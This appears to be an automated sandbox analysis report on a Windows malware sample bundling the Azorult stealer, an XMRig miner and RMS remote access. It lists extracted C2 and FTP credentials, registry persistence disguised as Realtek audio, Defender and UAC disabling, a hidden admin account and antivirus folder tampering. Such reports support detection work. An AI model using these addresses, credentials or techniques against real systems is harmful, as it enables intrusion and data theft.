Downloads.rar

General
Target

LtHv0O2KZDK4M637.exe

Filesize

139MB

Completed

19-11-2020 10:40

Score
10 /10
Malware Config

Extracted

Credentials

Protocol: ftp

Host: 109.248.203.81

Port: 21

Username: alex

Password: easypassword

Extracted

Family azorult
C2

http://195.245.112.115/index.php

Signatures 56

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Execution
Impact
Persistence
Privilege Escalation
  • Azorult

    Description

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings

    TTPs

    Modify RegistryModify Existing ServiceDisabling Security Tools
  • Modifies visiblity of hidden/system files in Explorer

    Tags

    TTPs

    Hidden Files and DirectoriesModify Registry
  • RMS

    Description

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass

    TTPs

    Bypass User Account ControlDisabling Security ToolsModify Registry
  • Windows security bypass

    TTPs

    Disabling Security ToolsModify Registry
  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    Tags

  • ACProtect 1.3x - 1.4x DLL software

    Description

    Detects file using ACProtect software.

    Reported IOCs

    resourceyara_rule
    behavioral14/files/0x000100000001abca-391.datacprotect
    behavioral14/files/0x000100000001abcb-392.datacprotect
  • Detected Stratum cryptominer command

    Description

    Looks to be attempting to contact Stratum mining pool.

    Tags

  • Grants admin privileges

    Description

    Uses net.exe to modify the user's privileges.

    TTPs

    Account Manipulation
  • XMRig Miner Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral14/files/0x0005000000019c0b-969.datxmrig
    behavioral14/files/0x0005000000019c0b-975.datxmrig
  • ASPack v2.12-2.42

    Description

    Detects executables packed with ASPack v2.12-2.42

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral14/files/0x000700000001abc1-377.dataspack_v212_v242
    behavioral14/files/0x000700000001abc1-378.dataspack_v212_v242
    behavioral14/files/0x000700000001abc1-384.dataspack_v212_v242
    behavioral14/files/0x000700000001abc1-389.dataspack_v212_v242
    behavioral14/files/0x000700000001abc1-390.dataspack_v212_v242
    behavioral14/files/0x000200000001a50e-393.dataspack_v212_v242
    behavioral14/files/0x000200000001a50e-397.dataspack_v212_v242
    behavioral14/files/0x000200000001a50e-396.dataspack_v212_v242
    behavioral14/files/0x000200000001a50e-434.dataspack_v212_v242
  • Blocks application from running via registry modification

    Description

    Adds application to list of disallowed applications.

    Tags

  • Drops file in Drivers directory
    taskhost.exeLtHv0O2KZDK4M637.execmd.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Windows\SysWOW64\drivers\conhost.exetaskhost.exe
    File opened for modificationC:\Windows\SysWOW64\drivers\conhost.exetaskhost.exe
    File opened for modificationC:\Windows\System32\drivers\etc\hostsLtHv0O2KZDK4M637.exe
    File opened for modificationC:\Windows\System32\drivers\etc\hostscmd.exe
  • Executes dropped EXE
    wini.exewinit.exerutserv.exerutserv.exesys.exerutserv.exerutserv.exerfusclient.exerfusclient.execheat.exerfusclient.exetaskhost.exetaskhostw.exewinlogon.exeR8.exeRar.exeRDPWInst.exeRDPWInst.exeaudiodg.exeMicrosoftHost.exe

    Reported IOCs

    pidprocess
    3692wini.exe
    4032winit.exe
    2156rutserv.exe
    2092rutserv.exe
    3976sys.exe
    4080rutserv.exe
    360rutserv.exe
    2412rfusclient.exe
    728rfusclient.exe
    640cheat.exe
    2128rfusclient.exe
    3096taskhost.exe
    1912taskhostw.exe
    4248winlogon.exe
    4236R8.exe
    4792Rar.exe
    4888RDPWInst.exe
    2544RDPWInst.exe
    5304audiodg.exe
    3040MicrosoftHost.exe
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Registers new Print Monitor

    TTPs

    Registry Run Keys / Startup FolderModify Registry
  • Sets DLL path for service in the registry

    TTPs

    Registry Run Keys / Startup FolderModify Registry
  • Sets file to hidden

    Description

    Modifies file attributes to stop it showing in Explorer etc.

    Tags

    TTPs

    Hidden Files and Directories
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral14/files/0x000100000001abca-391.datupx
    behavioral14/files/0x000100000001abcb-392.datupx
    behavioral14/files/0x000200000001abd4-479.datupx
    behavioral14/files/0x000200000001abd4-477.datupx
  • Loads dropped DLL
    sys.exesvchost.exe

    Reported IOCs

    pidprocess
    3976sys.exe
    3976sys.exe
    3976sys.exe
    3976sys.exe
    4952svchost.exe
  • Modifies file permissions
    icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    5396icacls.exe
    5280icacls.exe
    5924icacls.exe
    5200icacls.exe
    5228icacls.exe
    5780icacls.exe
    5252icacls.exe
    2268icacls.exe
    5752icacls.exe
    5884icacls.exe
    4396icacls.exe
    5284icacls.exe
    1268icacls.exe
    5816icacls.exe
    5756icacls.exe
    5868icacls.exe
    5676icacls.exe
    4232icacls.exe
    5316icacls.exe
    5552icacls.exe
    6020icacls.exe
    5124icacls.exe
    5584icacls.exe
    5456icacls.exe
    3672icacls.exe
    5436icacls.exe
    5488icacls.exe
    508icacls.exe
    5688icacls.exe
    5332icacls.exe
    5496icacls.exe
    5776icacls.exe
    5336icacls.exe
    724icacls.exe
    4784icacls.exe
    5568icacls.exe
    5156icacls.exe
    6012icacls.exe
    2752icacls.exe
    5376icacls.exe
    4412icacls.exe
    5928icacls.exe
    5748icacls.exe
    5444icacls.exe
    5848icacls.exe
    5664icacls.exe
    5760icacls.exe
    4628icacls.exe
    6072icacls.exe
    4320icacls.exe
    5040icacls.exe
    6124icacls.exe
    5724icacls.exe
    2588icacls.exe
    5404icacls.exe
    5692icacls.exe
    1040icacls.exe
    5412icacls.exe
    5984icacls.exe
    3912icacls.exe
    2784icacls.exe
    1456icacls.exe
    2552icacls.exe
    5352icacls.exe
  • Reads data files stored by FTP clients

    Description

    Tries to access configuration files associated with programs like FileZilla.

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Reads user/profile data of local email clients

    Description

    Email clients store some user data on disk where infostealers will often target it.

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Adds Run key to start application
    taskhostw.exeLtHv0O2KZDK4M637.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runtaskhostw.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"taskhostw.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunLtHv0O2KZDK4M637.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"LtHv0O2KZDK4M637.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    LtHv0O2KZDK4M637.exe

    TTPs

    System Information Discovery

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"LtHv0O2KZDK4M637.exe
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    13ip-api.com
  • Modifies WinLogon
    LtHv0O2KZDK4M637.exereg.exeRDPWInst.exeregedit.exe

    TTPs

    Winlogon Helper DLLModify Registry

    Reported IOCs

    descriptioniocprocess
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"LtHv0O2KZDK4M637.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListLtHv0O2KZDK4M637.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListreg.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"RDPWInst.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"reg.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListLtHv0O2KZDK4M637.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsLtHv0O2KZDK4M637.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsLtHv0O2KZDK4M637.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"LtHv0O2KZDK4M637.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListregedit.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"regedit.exe
  • Drops file in Program Files directory
    taskhost.exeattrib.exeattrib.exeattrib.exeattrib.exeRDPWInst.exeattrib.exeattrib.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Program Files (x86)\Microsoft JDXtaskhost.exe
    File opened for modificationC:\Program Files\ByteFencetaskhost.exe
    File opened for modificationC:\Program Files\SpyHuntertaskhost.exe
    File opened for modificationC:\Program Files\Cezuritytaskhost.exe
    File opened for modificationC:\Program Files\AVAST Software\Avastattrib.exe
    File opened for modificationC:\Program Files\ESETattrib.exe
    File opened for modificationC:\Program Files\Malwarebytes\Anti-Malwareattrib.exe
    File opened for modificationC:\Program Files\RDP Wrapper\rdpwrap.iniattrib.exe
    File opened for modificationC:\Program Files (x86)\SpyHuntertaskhost.exe
    File opened for modificationC:\Program Files\Malwarebytestaskhost.exe
    File opened for modificationC:\Program Files (x86)\AVAST Softwaretaskhost.exe
    File opened for modificationC:\Program Files (x86)\Cezuritytaskhost.exe
    File createdC:\Program Files\Common Files\System\iediagcmd.exetaskhost.exe
    File createdC:\Program Files\RDP Wrapper\rdpwrap.dllRDPWInst.exe
    File opened for modificationC:\Program Files\RDP Wrapper\rdpwrap.dllattrib.exe
    File opened for modificationC:\Program Files\RDP Wrapperattrib.exe
    File opened for modificationC:\Program Files (x86)\GRIZZLY Antivirustaskhost.exe
    File createdC:\Program Files\RDP Wrapper\rdpwrap.iniRDPWInst.exe
    File createdC:\Program Files\Common Files\System\iexplore.exetaskhost.exe
    File opened for modificationC:\Program Files\Enigma Software Grouptaskhost.exe
    File opened for modificationC:\Program Files\AVGtaskhost.exe
    File opened for modificationC:\Program Files\360\Total Securityattrib.exe
    File opened for modificationC:\Program Files (x86)\Kaspersky Labtaskhost.exe
    File opened for modificationC:\Program Files\ESETtaskhost.exe
    File opened for modificationC:\Program Files\AVAST Softwaretaskhost.exe
    File opened for modificationC:\Program Files\Kaspersky Labtaskhost.exe
    File opened for modificationC:\Program Files (x86)\Panda Securitytaskhost.exe
    File opened for modificationC:\Program Files (x86)\Zaxartaskhost.exe
    File opened for modificationC:\Program Files (x86)\360taskhost.exe
    File opened for modificationC:\Program Files\COMODOtaskhost.exe
    File opened for modificationC:\Program Files (x86)\AVGtaskhost.exe
  • Drops file in Windows directory
    taskhost.exeattrib.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Windows\boy.exetaskhost.exe
    File opened for modificationC:\Windows\boy.exetaskhost.exe
    File createdC:\Windows\svchost.exetaskhost.exe
    File opened for modificationC:\Windows\svchost.exetaskhost.exe
    File opened for modificationC:\Windows\NetworkDistributiontaskhost.exe
    File createdC:\Windows\java.exetaskhost.exe
    File opened for modificationC:\Windows\java.exetaskhost.exe
    File opened for modificationC:\WINDOWS\McMwtattrib.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks SCSI registry key(s)
    spoolsv.exe

    Description

    SCSI information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000spoolsv.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002spoolsv.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000spoolsv.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002spoolsv.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareIDspoolsv.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareIDspoolsv.exe
  • Checks processor information in registry
    winit.exesys.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringwinit.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0sys.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringsys.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0winit.exe
  • Delays execution with timeout.exe
    timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

    Tags

    Reported IOCs

    pidprocess
    2328timeout.exe
    4088timeout.exe
    4576timeout.exe
    4280timeout.exe
    200timeout.exe
    4936timeout.exe
    4288timeout.exe
    5796timeout.exe
    2900timeout.exe
  • Gathers network information
    ipconfig.exe

    Description

    Uses commandline utility to view network configuration.

    TTPs

    System Information DiscoveryCommand-Line Interface

    Reported IOCs

    pidprocess
    2004ipconfig.exe
  • Kills process with taskkill
    taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

    Tags

    Reported IOCs

    pidprocess
    4724taskkill.exe
    4504taskkill.exe
    4544taskkill.exe
    4840taskkill.exe
    4904taskkill.exe
    5940taskkill.exe
  • Modifies data under HKEY_USERS
    spoolsv.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devicesspoolsv.exe
    Key created\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPortsspoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"spoolsv.exe
    Key created\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devicesspoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"spoolsv.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPortsspoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"spoolsv.exe
    Key created\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPortsspoolsv.exe
    Key created\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devicesspoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"spoolsv.exe
    Set value (str)\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"spoolsv.exe
  • Modifies registry class
    winit.exeR8.execmd.exewini.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepagewinit.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local SettingsR8.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settingscmd.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settingswini.exe
    Key created\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Databasewinit.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charsetwinit.exe
  • NTFS ADS
    taskhostw.exeLtHv0O2KZDK4M637.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2taskhostw.exe
    File opened for modificationC:\Users\Admin\AppData\Local\Temp\WinMgmts:\LtHv0O2KZDK4M637.exe
  • Runs .reg file with regedit
    regedit.exeregedit.exe

    Reported IOCs

    pidprocess
    1140regedit.exe
    2576regedit.exe
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses
    LtHv0O2KZDK4M637.exerutserv.exe

    Reported IOCs

    pidprocess
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    2156rutserv.exe
    2156rutserv.exe
    2156rutserv.exe
    2156rutserv.exe
    2156rutserv.exe
    2156rutserv.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
    1316LtHv0O2KZDK4M637.exe
  • Suspicious behavior: GetForegroundWindowSpam
    taskhostw.exe

    Reported IOCs

    pidprocess
    1912taskhostw.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pidprocess
    624
    624
    624
  • Suspicious behavior: SetClipboardViewer
    rfusclient.exe

    Reported IOCs

    pidprocess
    2128rfusclient.exe
  • Suspicious use of AdjustPrivilegeToken
    rutserv.exerutserv.exerutserv.exeLtHv0O2KZDK4M637.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege2156rutserv.exe
    Token: SeDebugPrivilege4080rutserv.exe
    Token: SeTakeOwnershipPrivilege360rutserv.exe
    Token: SeTcbPrivilege360rutserv.exe
    Token: SeTcbPrivilege360rutserv.exe
    Token: SeDebugPrivilege1316LtHv0O2KZDK4M637.exe
    Token: 98005870560912472851316LtHv0O2KZDK4M637.exe
    Token: 816882647041316LtHv0O2KZDK4M637.exe
    Token: 98009465964383310961316LtHv0O2KZDK4M637.exe
    Token: 98009531933978661861316LtHv0O2KZDK4M637.exe
    Token: 98009575914435908541316LtHv0O2KZDK4M637.exe
    Token: 98009630890007466791316LtHv0O2KZDK4M637.exe
    Token: 98009872782606196251316LtHv0O2KZDK4M637.exe
    Token: 98009982733665426791316LtHv0O2KZDK4M637.exe
    Token: 98010004723894050051316LtHv0O2KZDK4M637.exe
    Token: 98010092684808543251316LtHv0O2KZDK4M637.exe
    Token: 98010169650608724721316LtHv0O2KZDK4M637.exe
    Token: 98010323582292976501316LtHv0O2KZDK4M637.exe
    Token: 98010378557864534751316LtHv0O2KZDK4M637.exe
    Token: 98010422538321781431316LtHv0O2KZDK4M637.exe
    Token: 98010664431088295851316LtHv0O2KZDK4M637.exe
    Token: 98010807367658230941316LtHv0O2KZDK4M637.exe
    Token: 98010939308946084581316LtHv0O2KZDK4M637.exe
    Token: 98011236177116387811316LtHv0O2KZDK4M637.exe
    Token: 98012049815827115791316LtHv0O2KZDK4M637.exe
    Token: 98012214742625679261316LtHv0O2KZDK4M637.exe
    Token: 98012368674477700481316LtHv0O2KZDK4M637.exe
    Token: 98012456635392193681316LtHv0O2KZDK4M637.exe
    Token: 98012544596390572961316LtHv0O2KZDK4M637.exe
    Token: 01316LtHv0O2KZDK4M637.exe
    Token: 324316761316LtHv0O2KZDK4M637.exe
    Token: 99202490326003939601316LtHv0O2KZDK4M637.exe
    Token: 01316LtHv0O2KZDK4M637.exe
    Token: 99202490326003939601316LtHv0O2KZDK4M637.exe
    Token: 42949672951316LtHv0O2KZDK4M637.exe
    Token: 83806544421223137301316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: 01316LtHv0O2KZDK4M637.exe
    Token: SeCreateTokenPrivilege1316LtHv0O2KZDK4M637.exe
    Token: 3523913143207045121316LtHv0O2KZDK4M637.exe
    Token: 83556170528113843201316LtHv0O2KZDK4M637.exe
    Token: 01316LtHv0O2KZDK4M637.exe
    Token: 83404090697525975471316LtHv0O2KZDK4M637.exe
    Token: 515396075521316LtHv0O2KZDK4M637.exe
    Token: 416587604918507441316LtHv0O2KZDK4M637.exe
    Token: 62584112521316LtHv0O2KZDK4M637.exe
    Token: 3531897293613812401316LtHv0O2KZDK4M637.exe
    Token: 97998448858969272021316LtHv0O2KZDK4M637.exe
    Token: 69378130028344710711316LtHv0O2KZDK4M637.exe
    Token: 01316LtHv0O2KZDK4M637.exe
    Token: 1092137856879770801316LtHv0O2KZDK4M637.exe
    Token: 3248094444562489601316LtHv0O2KZDK4M637.exe
  • Suspicious use of SetWindowsHookEx
    winit.exerutserv.exerutserv.exerutserv.exerutserv.exeWinMail.exeWinMail.exetaskhost.exetaskhostw.exeR8.exewinlogon.exeaudiodg.exeMicrosoftHost.exe

    Reported IOCs

    pidprocess
    4032winit.exe
    2156rutserv.exe
    2092rutserv.exe
    4080rutserv.exe
    360rutserv.exe
    976WinMail.exe
    556WinMail.exe
    3096taskhost.exe
    1912taskhostw.exe
    4236R8.exe
    4248winlogon.exe
    5304audiodg.exe
    3040MicrosoftHost.exe
  • Suspicious use of WriteProcessMemory
    LtHv0O2KZDK4M637.exewini.exeWScript.execmd.exerutserv.exewinit.exeWinMail.exesys.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1316 wrote to memory of 36921316LtHv0O2KZDK4M637.exewini.exe
    PID 1316 wrote to memory of 36921316LtHv0O2KZDK4M637.exewini.exe
    PID 1316 wrote to memory of 36921316LtHv0O2KZDK4M637.exewini.exe
    PID 3692 wrote to memory of 15643692wini.exeWScript.exe
    PID 3692 wrote to memory of 15643692wini.exeWScript.exe
    PID 3692 wrote to memory of 15643692wini.exeWScript.exe
    PID 3692 wrote to memory of 40323692wini.exewinit.exe
    PID 3692 wrote to memory of 40323692wini.exewinit.exe
    PID 3692 wrote to memory of 40323692wini.exewinit.exe
    PID 1564 wrote to memory of 32681564WScript.execmd.exe
    PID 1564 wrote to memory of 32681564WScript.execmd.exe
    PID 1564 wrote to memory of 32681564WScript.execmd.exe
    PID 3268 wrote to memory of 11403268cmd.exeregedit.exe
    PID 3268 wrote to memory of 11403268cmd.exeregedit.exe
    PID 3268 wrote to memory of 11403268cmd.exeregedit.exe
    PID 3268 wrote to memory of 25763268cmd.exeregedit.exe
    PID 3268 wrote to memory of 25763268cmd.exeregedit.exe
    PID 3268 wrote to memory of 25763268cmd.exeregedit.exe
